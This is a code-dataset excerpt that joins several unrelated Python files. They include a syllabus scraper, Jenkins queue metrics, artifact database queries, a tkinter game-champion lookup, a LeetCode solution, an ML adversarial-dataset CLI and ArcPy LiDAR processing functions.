result.write(line)
filtercount += 1
print filtercount, linecount
result.close()
types.close()
labels.close()
print "saved"
| 1.78125 | 2 |
wsl_spider/wsl_spider/spiders/course_info.py | waseda-room-finder/waseda-syllabus-scraper | 4 | 12795717 | <reponame>waseda-room-finder/waseda-syllabus-scraper<filename>wsl_spider/wsl_spider/spiders/course_info.py
# -*- coding: utf-8 -*-
import scrapy
# This file is used to scrape a single course page. It is not used currently.
class CourseInfoSpider(scrapy.Spider):
name = 'course_info'
allowed_domains = ['wsl.waseda.jp/syllabus']
start_urls = [('https://www.wsl.waseda.jp/syllabus/'
'JAA104.php?pKey=1200000007012017120000000712&pLng=jp')]
# Spanish II 'JAA104.php?pKey=210CO14300032017210CO1430021&pLng=en')]
# Info Design 'JAA104.php?pKey=26GF02200201201726GF02200226&pLng=en')]
base_xpath = '//*[@class="ct-common ct-sirabasu"]/tbody/tr'
def parse(self, response):
course_dict = {
'Course Title' : "",
'Instructor' : "",
'Schedule': "",
'Campus' : "",
'Classroom' : ""
}
course_title = response.xpath((
self.base_xpath + '[contains(th/text(),"Course Title")]/td/div/text()'
)).extract_first()
course_sub_title = response.xpath((
self.base_xpath + '[contains(th/text(),"Course Title")]/td/p/text()'
)).extract_first()
course_dict['Course Title'] = course_title if course_sub_title is None else course_title + course_sub_title
course_dict['Instructor'] = response.xpath((
self.base_xpath + '[contains(th/text(),"Instructor")]/td/text()'
)).extract_first()
course_dict['Schedule'] = response.xpath((
self.base_xpath + '[contains(th/text(),"Term/Day/Period")]/td/text()'
)).extract_first()
classroom_campus = response.xpath((
self.base_xpath + '[contains(th/text(),"Classroom")]/td/text()'
)).extract()
course_dict['Campus'] = classroom_campus[1]
course_dict['Classroom'] = classroom_campus[0]
for key, value in course_dict.items():
value = value.replace(u'\xa0', u' ')
yield course_dict
| 2.765625 | 3 |
jenkins/metrics/queue_metrics.py | levep/jenkins-exporter | 16 | 12795718 | from prometheus_client.core import GaugeMetricFamily
def make_metrics(queue):
list_metrics = []
# Total items in Queue
metric = GaugeMetricFamily(
'jenkins_queue_total',
'Total items in Queue',
labels=None
)
metric.add_metric(
labels=[],
value=queue.get_total_items()
)
list_metrics.append(metric)
# Duration of an item in Queue
metric = GaugeMetricFamily(
'jenkins_queue_item_duration',
'Duration of a item in Queue in seconds',
labels=['queue_id', 'item_name']
)
list_items = queue.get_list_items()
for item_id in list_items:
item = queue.get_item(item_id)
item_name = item['name']
queue_id = str(item_id)
metric.add_metric(
labels=[queue_id, item_name],
value=queue.get_in_queue_duration(item_id)
)
list_metrics.append(metric)
return list_metrics
| 2.515625 | 3 |
webapp/src/database/queries/artifact_queries.py | muctadir/labeling-machine | 0 | 12795719 | from datetime import datetime
from typing import List
from sqlalchemy import insert, func, select, distinct
from src import db
from src.database.models import Artifact, LockedArtifact, ArtifactLabelRelation, FlaggedArtifact, LabelingData
from src.helper.tools_common import string_none_or_empty, who_is_signed_in
def get_artifact_by_id(art_id: int):
return db.session.execute(select(Artifact).where(Artifact.id == art_id)).scalar()
def add_artifacts(artifact_txt_list: List[str], artifact_identifier: str, creator: str,
manually_uploaded: bool = False) -> List[int]:
artifact_txt_list = filter(lambda s: not string_none_or_empty(s), artifact_txt_list)
inserted_ids = []
for art in artifact_txt_list:
stmt = insert(Artifact).values(text=art, identifier=artifact_identifier, created_by=creator,
uploaded_manually=manually_uploaded)
inserted_ids.append(db.session.execute(stmt).inserted_primary_key[0])
db.session.commit()
return inserted_ids
def get_artifacts_with_label(label_text: str) -> List[Artifact]:
qry = select(Artifact).join(ArtifactLabelRelation.artifact).join(ArtifactLabelRelation.label).where(
LabelingData.labeling == label_text)
return [artifact for artifact, in db.session.execute(qry).all()]
def unlock_artifacts_by(username):
if not username:
return
my_lock = LockedArtifact.query.filter_by(created_by=username).first()
if my_lock is not None:
db.session.delete(my_lock)
db.session.commit()
def lock_artifact_by(username, artifact_id):
if not username:
return
unlock_artifacts_by(username)
db.session.add(LockedArtifact(created_by=username, artifact_id=artifact_id))
db.session.commit()
def get_locked_artifacts():
update_api_locks()
result = db.session.query(LockedArtifact.artifact_id, func.count(LockedArtifact.created_by)).group_by(
LockedArtifact.artifact_id).all()
all_locks = {row[0]: row[1] for row in result}
return all_locks
def update_api_locks():
all_locks = LockedArtifact.query.all()
now_datetime = datetime.utcnow()
for aLock in all_locks:
if (now_datetime - aLock.created_at).total_seconds() / 60 >= 15: # 15min
# print("Unlocking Artifact: {} -> {}:{}".format(aLock.username, aLock.sourceId, aLock.artifact_post_id))
db.session.delete(aLock)
db.session.commit()
def total_artifact_count() -> int:
return len(db.session.execute(select(Artifact.id)).all())
def artifact_needs_labeling_count() -> int:
query = select(Artifact.id).except_(
select(ArtifactLabelRelation.artifact_id).group_by(ArtifactLabelRelation.artifact_id).having(
func.count(ArtifactLabelRelation.created_by) > 1))
return len(db.session.execute(query).all())
def get_false_positive_artifacts():
"""
Return artifacts marked as false positive by me, or marked as false positive by at least 2 people
"""
q_artifacts_marked_fp_by_me = db.session.query(distinct(FlaggedArtifact.artifact_id)).filter(
FlaggedArtifact.created_by == who_is_signed_in())
q_artifacts_marked_fp_by_2 = db.session.query(
distinct(FlaggedArtifact.artifact_id)).group_by(FlaggedArtifact.artifact_id).having(func.count() > 1)
result = {row[0] for row in q_artifacts_marked_fp_by_me.union(q_artifacts_marked_fp_by_2).all()}
return result
| 2.328125 | 2 |
src/PQWER_dex.py | jsleslie/PQWER | 0 | 12795720 | <reponame>jsleslie/PQWER<gh_stars>0
"""
changes made:
make widgets parent explicitly declared
Use either with root window or Toplevel
Bind Return key to selection method
"""
#from tkinter import *
import tkinter as tk
import re
from PIL import ImageTk, Image
import json
from tkinter import ttk
# Helper function extracting ability descriptions from champion json files
def get_PQWER(champion):
"""
Consumes a champion name in string form and returns a dictionary containing
the champion's passive, Q, W, E, and R ability names and descriptions
Parameters:
-----------
champion string
Example:
-----------
get_PQWER("Malphite") -> dictionary
"""
# Read champ-specific json
with open(f"data/dragontail-11.1.1/11.1.1/data/en_US/champion/{champion}.json") as f:
data = json.load(f)
global champ_info
champ_info =dict()
# Add passive
passive_name = data['data'][champion]['passive']['name']
passive_description = data['data'][champion]['passive']['description']
combined_passive = passive_name + '\n\n' + passive_description
champ_info['passive'] = combined_passive
# Add Q
Q_name = data['data'][champion]['spells'][0]['name']
Q_description = data['data'][champion]['spells'][0]['description']
combined_Q = Q_name + '\n\n' + Q_description
champ_info['Q'] = combined_Q
# Add W
W_name = data['data'][champion]['spells'][1]['name']
W_description = data['data'][champion]['spells'][1]['description']
combined_W = W_name + '\n\n' + W_description
champ_info['W'] = combined_W
# Add E
E_name = data['data'][champion]['spells'][2]['name']
E_description = data['data'][champion]['spells'][2]['description']
combined_E = E_name + '\n\n' + E_description
champ_info['E'] = combined_E
# Add R
R_name = data['data'][champion]['spells'][3]['name']
R_description = data['data'][champion]['spells'][3]['description']
combined_R = R_name + '\n\n' + R_description
champ_info['R'] = combined_R
return champ_info
def update_descriptions(champion):
champ_info = get_PQWER(champion)
Passive_text.config(text=champ_info['passive'])
Q_text.config(text=champ_info['Q'])
W_text.config(text=champ_info['W'])
E_text.config(text=champ_info['E'])
R_text.config(text=champ_info['R'])
# Class adopted from samuelkazeem/tkinter-autocomplete-listbox.py
class AutocompleteEntry(tk.Entry):
def __init__(self, autocompleteList, *args, **kwargs):
self.listboxLength = 0
self.parent = args[0]
# Custom matches function
if 'matchesFunction' in kwargs:
self.matchesFunction = kwargs['matchesFunction']
del kwargs['matchesFunction']
else:
def matches(fieldValue, acListEntry):
pattern = re.compile(
'.*' + re.escape(fieldValue) + '.*', re.IGNORECASE)
return re.match(pattern, acListEntry)
self.matchesFunction = matches
# Custom return function
if 'returnFunction' in kwargs:
self.returnFunction = kwargs['returnFunction']
del kwargs['returnFunction']
else:
def selectedValue(value):
print(value)
self.returnFunction = selectedValue
tk.Entry.__init__(self, *args, **kwargs)
#super().__init__(*args, **kwargs)
self.focus()
self.autocompleteList = autocompleteList
self.var = self["textvariable"]
if self.var == '':
self.var = self["textvariable"] = tk.StringVar()
self.var.trace('w', self.changed)
self.bind("<Right>", self.selection)
self.bind("<Up>", self.moveUp)
self.bind("<Down>", self.moveDown)
self.bind("<Return>", self.selection)
self.bind("<Escape>", self.deleteListbox)
self.listboxUp = False
def deleteListbox(self, event=None):
if self.listboxUp:
self.listbox.destroy()
self.listboxUp = False
def select(self, event=None):
if self.listboxUp:
index = self.listbox.curselection()[0]
value = self.listbox.get(tk.ACTIVE)
self.listbox.destroy()
self.listboxUp = False
self.delete(0, tk.END)
self.insert(tk.END, value)
self.returnFunction(value)
def changed(self, name, index, mode):
if self.var.get() == '':
self.deleteListbox()
else:
words = self.comparison()
if words:
if not self.listboxUp:
self.listboxLength = len(words)
self.listbox = tk.Listbox(self.parent,
width=self["width"], height=self.listboxLength)
self.listbox.bind("<Button-1>", self.selection)
self.listbox.bind("<Right>", self.selection)
self.listbox.place(
x=self.winfo_x(), y=self.winfo_y() + self.winfo_height())
self.listboxUp = True
else:
self.listboxLength = len(words)
self.listbox.config(height=self.listboxLength)
self.listbox.delete(0, tk.END)
for w in words:
self.listbox.insert(tk.END, w)
else:
self.deleteListbox()
def selection(self, event):
if self.listboxUp:
self.var.set(self.listbox.get(tk.ACTIVE))
self.listbox.destroy()
self.listboxUp = False
self.icursor(tk.END)
def moveUp(self, event):
if self.listboxUp:
if self.listbox.curselection() == ():
index = '0'
else:
index = self.listbox.curselection()[0]
self.listbox.selection_clear(first=index)
index = str(int(index) - 1)
if int(index) == -1:
index = str(self.listboxLength-1)
self.listbox.see(index) # Scroll!
self.listbox.selection_set(first=index)
self.listbox.activate(index)
def moveDown(self, event):
if self.listboxUp:
if self.listbox.curselection() == ():
index = '-1'
else:
index = self.listbox.curselection()[0]
if index != tk.END:
self.listbox.selection_clear(first=index)
if int(index) == self.listboxLength-1:
index = "0"
else:
index = str(int(index)+1)
self.listbox.see(index) # Scroll!
self.listbox.selection_set(first=index)
self.listbox.activate(index)
def comparison(self):
return [w for w in self.autocompleteList if self.matchesFunction(self.var.get(), w)]
if __name__ == '__main__':
# Taken from https://www.reddit.com/r/leagueoflegends/comments/cumsa6/list_of_league_of_legends_champion_separated_by/
autocompleteList = ["Aatrox","Ahri","Akali","Alistar","Amumu","Anivia","Annie","Aphelios","Ashe","Aurelion Sol","Azir",\
"Bard","Blitzcrank","Brand","Braum","Caitlyn","Camille","Cassiopeia","Cho'Gath","Corki","Darius","Diana","Dr. Mundo","Draven",\
"Ekko","Elise","Evelynn","Ezreal","Fiddlesticks","Fiora","Fizz","Galio","Gangplank","Garen","Gnar","Gragas","Graves","Hecarim",\
"Heimerdinger","Illaoi","Irelia","Ivern","Janna","<NAME>","Jax","Jayce","Jhin","Jinx","Kai'Sa","Kalista","Karma","Karthus",\
"Kassadin","Katarina","Kayle","Kayn","Kennen","Kha'Zix","Kindred","Kled","Kog'Maw","LeBlanc","<NAME>","Leona","Lillia","Lissandra",\
"Lucian","Lulu","Lux","Malphite","Malzahar","Maokai","Master Yi","Miss Fortune","Mordekaiser","Morgana","Nami","Nasus","Nautilus",\
"Neeko","Nidalee","Nocturne","Nunu and Willump","Olaf","Orianna","Ornn","Pantheon","Poppy","Pyke","Qiyana","Quinn","Rakan",\
"Rammus","Rek'Sai","Rell","Renekton","Rengar","Riven","Rumble","Ryze","Samira","Sejuani","Senna","Seraphine","Sett",\
"Shaco","Shen","Shyvana","Singed","Sion","Sivir","Skarner","Sona","Soraka","Swain","Sylas","Syndra","<NAME>","Taliyah",\
"Talon","Taric","Teemo","Thresh","Tristana","Trundle","Tryndamere","Twisted Fate","Twitch","Udyr","Urgot","Varus","Vayne","Veigar",\
"Vel'Koz","Vi","Viktor","Vladimir","Volibear","Warwick","Wukong","Xayah","Xerath","<NAME>","Yasuo","Yone","Yorick","Yuumi","Zac","Zed","Ziggs","Zilean","Zoe","Zyra"]
def matches(fieldValue, acListEntry):
pattern = re.compile(re.escape(fieldValue) + '.*', re.IGNORECASE)
return re.match(pattern, acListEntry)
root = tk.Tk()
topLevel = tk.Toplevel()
topLevel.title('League Champions Dex')
#pass either root or toplevel as the second argument to use as entry's parent widget
entry = AutocompleteEntry(
autocompleteList, topLevel, width=32, matchesFunction=matches)
entry.grid(row=0, column=0, columnspan=2)
search_button = tk.Button(topLevel,text="Search", padx=10, command=lambda: update_descriptions(entry.get()))
search_button.grid(row=0,column=3)
# Save dynamic descriptions
P = tk.StringVar()
# tk.Button(topLevel, text='Python').grid(column=0)
# tk.Button(topLevel, text='Tkinter').grid(column=0)
# tk.Button(topLevel, text='Regular Expressions').grid(column=0)
# tk.Button(topLevel, text='Fixed bugs').grid(column=0)
# tk.Button(topLevel, text='New features').grid(column=0)
# tk.Button(topLevel, text='Check code comments').grid(column=0)
# Load images
passive_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/Passive.png"))
Q_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/Q.png"))
W_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/W.png"))
E_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/E.png"))
R_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/R.png"))
# Place them inside labels
passive_label = tk.Label(topLevel, image=passive_icon)
Q_label = tk.Label(topLevel, image=Q_icon)
W_label = tk.Label(topLevel, image=W_icon)
E_label = tk.Label(topLevel, image=E_icon)
R_label = tk.Label(topLevel, image=R_icon)
# Assign locations to image labels
passive_label.grid(row=1,column=0, pady=20)
Q_label.grid(row=2,column=0, pady=20)
W_label.grid(row=3, column=0, pady=20)
E_label.grid(row=4, column=0, pady=20)
R_label.grid(row=5, column=0,pady=20)
# Add text boxes
# Passive_text = tk.Label(topLevel, textvariable= P)
# P.set(champ_info['passive'])
Passive_text = tk.Label(topLevel, text="Placeholder", wraplength=600, justify="left")
Q_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
W_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
E_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
R_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
# Assign locations to text boxes
Passive_text.grid(row=1, column=1, pady=20)
Q_text.grid(row=2, column=1, pady=20)
W_text.grid(row=3, column=1, pady=20)
E_text.grid(row=4, column=1, pady=20)
R_text.grid(row=5, column=1, pady=20)
# Add exit button
button_quit = tk.Button(topLevel, text="Exit Program", command=root.quit)
button_quit.grid(row=10, column=3)
root.mainloop() | 2.515625 | 3 |
code/Solution_0187_findRepeatedDnaSequences.py | qizhenkang/myLeetCode | 0 | 12795721 | <reponame>qizhenkang/myLeetCode
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 8 00:05:44 2021
@author: qizhe
"""
class Solution:
def findRepeatedDnaSequences(self, s: str):
"""
读题:
1、感觉像是,在找一个重复字符串,同时字符串长度为10,不是找目标,而是没有目标地找
2、心理上感觉比较麻烦,没有想到好办法
3、长度固定为10,字符只有ATCG四种,字符串最长达到1e5
4、感觉是一个长度固定为10的滑动窗口,然后做一个哈希表来计数,不确定是否会超时
测试:
1、错误一次,通过,但效率不是很高
2、用时10min
答案:
1、答案利用了ATCG进行了位运算的优化,本质上是利用滑动窗口每次只改变1点点
2、这里的做法:1 ATCG映射为 00 01 10 11; 2 利用滑动窗口
改后效果:
1、测试通过,用时81% 内存90%
"""
N = len(s)
if N <= 10:
return []
result = []
ATCGdict = {'A':0b00,'T':0b01,'C':0b10,'G':0b11}
window = int(0)
strDict = {}
for i in range(10):
window <<= 2
window |= ATCGdict[s[i]]
strDict[window] = 1
# print(window)
for i in range(10,N):
# print(i,'1',bin(window))
window <<= 2
window |= ATCGdict[s[i]]
window &= 1048575
# print(i,'2',bin(window))
if window in strDict:
strDict[window] += 1
if s[i-9:i+1] not in result:
result.append(s[i-9:i+1])
else:
strDict[window] =1
# print(strDict)
return result
if __name__ == '__main__':
solu = Solution()
# input_List = [[5,1,9,11],[2,4,8,10],[13,3,6,7],[15,14,12,16]]
# input_List = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
# s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
s = "AAAAAAAAAAAAA"
# intervals = [[1,1],[3,5],[6,7],[8,10],[12,16]]
# newInterval = [2,17]
# intervals = [[2,5]]
# newInterval = [5,7]
# input_List = 1
# numerator = -50
# strs = ["eat", "tea", "tan", "ate", "nat", "bat"]
result = solu.findRepeatedDnaSequences(s)
output_Str = ' result = ' + str(result)
print(output_Str) | 2.546875 | 3 |
tests/test_forms.py | saxix/django-geo | 9 | 12795722 | <reponame>saxix/django-geo<filename>tests/test_forms.py
# -*- coding: utf-8 -*-
import pytest
from geo.forms import administrativeareaform_factory_for_country
from geo.models import AdministrativeArea
from .fixtures import hierachy
@pytest.mark.django_db
def test_administrativeareaform_factory(hierachy):
italy, regione, provincia, comune = hierachy
Form = administrativeareaform_factory_for_country(italy)
instance = AdministrativeArea()
form = Form({'name': 'Lazio',
'type': regione.pk,
'country': italy.pk},
instance=instance)
form.full_clean()
assert form.is_valid()
| 2.015625 | 2 |
scripts/npc/autogen_10308.py | hsienjan/SideQuest-Server | 0 | 12795723 | # ObjectID: 1000002
# ParentID: 10308
# Character field ID when accessed: 4000032
# Object Position X: 2522
# Object Position Y: -22
| 0.980469 | 1 |
demo/auth/__init__.py | yangfan9702/cibo | 0 | 12795724 | from demo.exceptions import AuthException
def token_auth(fn):
def wrapper(*args, **kwargs):
from flask import request
if request.headers.get("token", None) != "123":
raise AuthException("Fail to get access")
return fn(*args, **kwargs)
return wrapper
| 2.65625 | 3 |
counter_attack/cli/commands/approximation_dataset.py | samuelemarro/anti-attacks | 0 | 12795725 | <gh_stars>0
import pathlib
import click
import torch
from counter_attack import defenses, rejectors, training, utils
from counter_attack.cli import definitions, options, parsing
@click.group(name='approximation-dataset')
def approximation_dataset():
pass
@approximation_dataset.command(name='preprocessor')
@options.global_options
@options.dataset_options('train', 'train')
@options.standard_model_options
@options.pretrained_model_options
@options.preprocessor_options
@options.adversarial_dataset_options
@options.approximation_dataset_options('preprocessor')
def approximation_dataset_preprocessor(options):
"""
Generates the dataset to train a substitute model for models
with preprocessors.
Saves the labels predicted by the defended model, using the genuine
dataset + an adversarial dataset.
"""
adversarial_loader = options['adversarial_loader']
approximation_dataset_path = options['approximation_dataset_path']
foolbox_model = options['foolbox_model']
genuine_loader = options['loader']
preprocessor = options['preprocessor']
defended_model = defenses.PreprocessorDefenseModel(
foolbox_model, preprocessor)
genuine_approximation_dataset = training.generate_approximation_dataset(defended_model, genuine_loader, 'Genuine Approximation Dataset')
adversarial_approximation_dataset = training.generate_approximation_dataset(defended_model, adversarial_loader, 'Adversarial Approximation Dataset')
approximation_dataset = genuine_approximation_dataset + adversarial_approximation_dataset
utils.save_zip(approximation_dataset, approximation_dataset_path)
@approximation_dataset.command(name='model')
@options.global_options
@options.dataset_options('train', 'train')
@options.standard_model_options
@options.custom_model_options
@options.adversarial_dataset_options
@options.approximation_dataset_options('model')
def approximation_dataset_model(options):
adversarial_loader = options['adversarial_loader']
approximation_dataset_path = options['approximation_dataset_path']
custom_foolbox_model = options['custom_foolbox_model']
genuine_loader = options['loader']
genuine_approximation_dataset = training.generate_approximation_dataset(custom_foolbox_model, genuine_loader, 'Genuine Approximation Dataset')
adversarial_approximation_dataset = training.generate_approximation_dataset(custom_foolbox_model, adversarial_loader, 'Adversarial Approximation Dataset')
approximation_dataset = genuine_approximation_dataset + adversarial_approximation_dataset
utils.save_zip(approximation_dataset, approximation_dataset_path)
@approximation_dataset.command(name='rejector')
@options.global_options
@options.dataset_options('train', 'train')
@options.standard_model_options
@options.pretrained_model_options
@options.distance_options
@options.counter_attack_options(False)
@options.detector_options
@options.rejector_options
@options.adversarial_dataset_options
@options.approximation_dataset_options('rejector')
def approximation_dataset_rejector(options):
adversarial_loader = options['adversarial_loader']
approximation_dataset_path = options['approximation_dataset_path']
foolbox_model = options['foolbox_model']
genuine_loader = options['loader']
rejector = options['rejector']
defended_model = rejectors.RejectorModel(foolbox_model, rejector)
genuine_approximation_dataset = training.generate_approximation_dataset(defended_model, genuine_loader, 'Genuine Approximation Dataset')
adversarial_approximation_dataset = training.generate_approximation_dataset(defended_model, adversarial_loader, 'Adversarial Approximation Dataset')
approximation_dataset = genuine_approximation_dataset + adversarial_approximation_dataset
utils.save_zip(approximation_dataset, approximation_dataset_path)
| 2.34375 | 2 |
kite-python/kite_ml/kite/utils/reduce.py | kiteco/kiteco-public | 17 | 12795726 | <filename>kite-python/kite_ml/kite/utils/reduce.py<gh_stars>10-100
import tensorflow as tf
def is_empty(x: tf.Tensor) -> tf.Tensor:
return tf.equal(tf.reduce_sum(tf.shape(x)), 0)
def safe_reduce_mean(x: tf.Tensor, value: float, name: str) -> tf.Tensor:
# need conditional in case the tensor is empty to avoid nans
with tf.name_scope('{}_safe_mean'.format(name)):
return tf.cond(
is_empty(x),
true_fn=lambda: value, false_fn=lambda: tf.reduce_mean(x), name=name,
) | 2.765625 | 3 |
clean_purchase.py | MasonDMitchell/HackNC-2019 | 0 | 12795727 | import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import scipy as sci
import pandas as pd
import numbers
import csv
import sys
filepath = sys.argv[1]
filename = filepath[filepath.rfind('/')+1:]
print(filepath)
data = pd.read_csv(filepath)
print("Adding year column")
data['year'] = data.apply(lambda row: str(row.QREDATE)[-6:-2], axis=1)
print("Adding month column")
data['month'] = data.apply(lambda row: str(row.QREDATE)[-10:-8].lstrip('0'), axis=1)
print("Adding day column")
data['day'] = data.apply(lambda row: str(row.QREDATE)[-8:-6].lstrip('0'), axis=1)
print('Removing invalid users')
invalid_users = []
users = data.NEWID.unique()
for user in users:
user_data = data.loc[data['NEWID'] == user]
#Finding invalid users by determining if their QREDATE is invalid
invalid = user_data.loc[user_data['QREDATE_'] == 'B']
if len(invalid) > 0:
invalid_users.append(user)
data = data[data.NEWID != user]
invalid2 = user_data.loc[user_data.year == 'n']
if len(invalid2) > 0 and user not in invalid_users:
invalid_users.append(user)
data = data[data.NEWID != user]
print("Mapping UCC to Category")
uccdata = pd.read_csv("categorized_ucc_dictionary.csv")
data['category'] = data['UCC'].map(uccdata.set_index('UCC')['CATEGORY'])
print("Dropping unneeded columns")
data = data.drop(columns=["UCC","ALLOC","GIFT","PUB_FLAG","QREDATE","QREDATE_"],axis=1)
data.to_csv('clean_data/'+filename,index=False)
| 2.9375 | 3 |
lidar_to_DEM_functions.py | xaviernogueira/gcs_gui | 4 | 12795728 | import arcpy
from arcpy import env
from arcpy.sa import *
import file_functions
from file_functions import *
import create_centerline
import create_station_lines
from create_station_lines import create_station_lines_function
import os
from os import listdir
from os.path import isfile, join
import xlrd
import shutil
from openpyxl.workbook import Workbook
from openpyxl.reader.excel import load_workbook, InvalidFileException
def lidar_footptint(lasbin, lidardir, spatialref_shp):
"""This function converts LAZ files to LAS file format as well as producing a LiDAR extent polygon.
in_folder must be a directory containing nothing but raw LAZ files
spatial_ref must be an ArcGIS spatial reference object with units of feet.
las_tools_bin must be the location of the 'bin' folder installed with LAStools by rapidlasso
Returns: A shapefile w/ LiDAR coverage to be used to make a ground polygon for LAStools processing"""
files_in_direct = [f for f in listdir(lidardir) if isfile(join(lidardir, f))]
laspath = lidardir + '\\las_files'
if not os.path.exists(laspath):
os.makedirs(laspath)
# Initiate temp files folder formatted for LAStools
temp_files = lidardir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
in_spatial_ref = arcpy.Describe(spatialref_shp).spatialReference
try:
# Convert laz files to LAS files
for f in files_in_direct:
if f[-4:] == ".laz":
# Correct format, can alter between browse() input and default
if lasbin[-1] != 'n':
lasbin = lasbin[:-1]
cmd("%s\\laszip.exe -i %s\\%s -o %s\\%s_noprj.las" % (lasbin, lidardir, f, laspath, f[:-4]))
print("%s\\laszip.exe -i %s\\%s -o %s\\%s_noprj.las" % (lasbin, lidardir, f, laspath, f[:-4]))
cmd("%s\\las2las.exe -i %s\\%s_noprj.las -o %s\\%s.las" % (lasbin, laspath, f[:-4], laspath, f[:-4]))
print("%s\\las2las.exe -i %s\\%s_noprj.las -o %s\\%s.las" % (lasbin, laspath, f[:-4], laspath, f[:-4]))
files_in_laspath = [f for f in listdir(laspath) if isfile(join(laspath, f))]
# Delete unnecessary index files
for f in files_in_laspath:
if f[-4:] == 'lasx':
os.remove(laspath + "\\%s" % f)
if f[-5] == 'j':
os.remove(laspath + "\\%s" % f)
raw_las_dataset = arcpy.CreateLasDataset_management(laspath, lidardir + "\\raw_las_dataset.lasd",
spatial_reference=in_spatial_ref, compute_stats=True)
lidar_ras = CreateConstantRaster(1, extent=raw_las_dataset)
lidar_footprint = arcpy.RasterToPolygon_conversion(lidar_ras, lidardir + '\\las_footprint.shp')
except arcpy.ExecuteError:
print(arcpy.GetMessages())
return lidar_footprint
def define_ground_polygon(lidar_footprint, lidardir, naipdir, ndvi_thresh, aoi_shp):
"""This function takes the defined lidar footprint from the lidar_footprint() function, as well as a defined NAIP imagery location (in .jpg2)
and makes a polygon of vegeation using a NDVI threshold of >0.4. This polygon is erased from the lidar footprint to give a ground_polygon used
to define processing settings"""
# Set processing extent to the LiDAR data extent
arcpy.env.extent = lidar_footprint
in_spatial_ref = arcpy.Describe(lidar_footprint).spatialReference
# Find NAIP imagery in folder
naip_imagery = [f for f in listdir(naipdir) if isfile(join(naipdir, f))]
# Initiate temp files folder
temp_files = lidardir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
if len(naip_imagery) > 1:
add_to_mosaic = [naipdir + "\\" + f for f in naip_imagery]
naip_imagery = arcpy.MosaicToNewRaster_management(add_to_mosaic, output_location=lidardir,
raster_dataset_name_with_extension="NAIP_mos.tif",
coordinate_system_for_the_raster=in_spatial_ref,
number_of_bands=4)
else:
naip_imagery = (naipdir + "\\%s" % naip_imagery[0])
naip_imagery = arcpy.ProjectRaster_management(naip_imagery, lidardir + "\\NAIP_prj.tif", in_spatial_ref)
try:
# Extract bands 1 (red) and 4 (NIR)
red_lyr = arcpy.MakeRasterLayer_management(naip_imagery, temp_files + "\\rd_lyr", band_index=0)
nir_lyr = arcpy.MakeRasterLayer_management(naip_imagery, temp_files + "\\nr_lyr", band_index=4)
red_lyr = arcpy.SaveToLayerFile_management(red_lyr, temp_files + "\\red_ras.lyr")
nir_lyr = arcpy.SaveToLayerFile_management(nir_lyr, temp_files + "\\nir_ras.lyr")
red_ras = arcpy.CopyRaster_management(red_lyr, temp_files + "\\red_ras.tif", format="TIFF")
nir_ras = arcpy.CopyRaster_management(nir_lyr, temp_files + "\\nir_ras.tif", format="TIFF")
red_ras = Raster(red_ras)
nir_ras = Raster(nir_ras)
# Calculate ndvi and generate polygon delineating values > ndvi_thresh
ndvi = lidardir + "\\NDVI.tif"
ndvi_ras = ((nir_ras - red_ras) / (nir_ras + red_ras))
ndvi_ras.save(ndvi)
veg_ras_raw = Con(arcpy.sa.Raster(ndvi) >= ndvi_thresh, 1)
veg_ras_raw.save(temp_files + "\\veg_ras_raw.tif")
veg_ras = MajorityFilter(veg_ras_raw, "EIGHT", "MAJORITY")
veg_ras.save(temp_files + "\\veg_ras.tif")
veg_poly = arcpy.RasterToPolygon_conversion(veg_ras, lidardir + "\\veg_poly_ndvi.shp", simplify=FALSE)
# Make polygon representing bare ground
if aoi_shp != '':
ground_poly = arcpy.Erase_analysis(lidar_footprint, veg_poly, temp_files + "\\ground_poly_full.shp")
aoi_prj = arcpy.Project_management(aoi_shp, temp_files + "\\aoi_prj_to_inref.shp",
out_coor_system=in_spatial_ref)
ground_poly = arcpy.Clip_analysis(ground_poly, aoi_prj, lidardir + "\\ground_poly.shp")
else:
ground_poly = arcpy.Erase_analysis(lidar_footprint, veg_poly, lidardir + "\\ground_poly.shp")
ground_poly = arcpy.DefineProjection_management(ground_poly, in_spatial_ref)
print("AOI bare-ground polygon @ %s" % ground_poly)
except arcpy.ExecuteError:
print(arcpy.GetMessages())
def lidar_to_raster(lidardir, spatialref_shp, aoi_shp, sample_meth, tri_meth, void_meth, m_cell_size=1):
"""Converts processed LAS files to a LAS dataset, and then to a raster with cell size of 1m
Args: Folder containing LAS files, desired cell size in meters (default is 1m), and ft spatial reference
Returns: Raster name for use in detrending """
# Create variables with relevant folders
lasdir = lidardir + '\\las_files'
ground_lasdir = lasdir + '\\09_ground_rm_duplicates'
# Create addresses for generated .lasd, .tiff files
out_dem = lidardir + "\\las_dem.tif"
out_las = lasdir + '\\las_dataset.lasd'
# Initiate temp files folder
temp_files = lidardir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
# Set up output spatial reference and convert units if necessary
in_spatial_ref = arcpy.Describe(spatialref_shp).spatialReference
out_spatial_ref = arcpy.Describe(aoi_shp).spatialReference
if in_spatial_ref.linearUnitName == 'Meter':
cell_size = m_cell_size
print('LAS units are Meters')
elif in_spatial_ref.linearUnitName == 'Foot_US':
cell_size = (3.28 * m_cell_size)
print('LAS units are Feet')
else:
return print('Linear unit name for %s uncertain, please use a PROJECTED COORDINATE SYSTEM' % os.path.basename(in_spatial_ref))
# Set up interpolation method string
if sample_meth == 'BINNING':
method_str = '%s AVERAGE %s' % (sample_meth, void_meth)
else:
method_str = "%s %s NO_THINNING MAXIMUM 0" % (sample_meth, tri_meth)
print('Methods: %s' % method_str)
try:
no_prj_dem = temp_files + '\\noprj_dem.tif'
las_dataset = arcpy.CreateLasDataset_management(ground_lasdir, out_las, spatial_reference=in_spatial_ref,
compute_stats=True)
lidar_raster = arcpy.LasDatasetToRaster_conversion(las_dataset, value_field='ELEVATION', data_type='FLOAT',
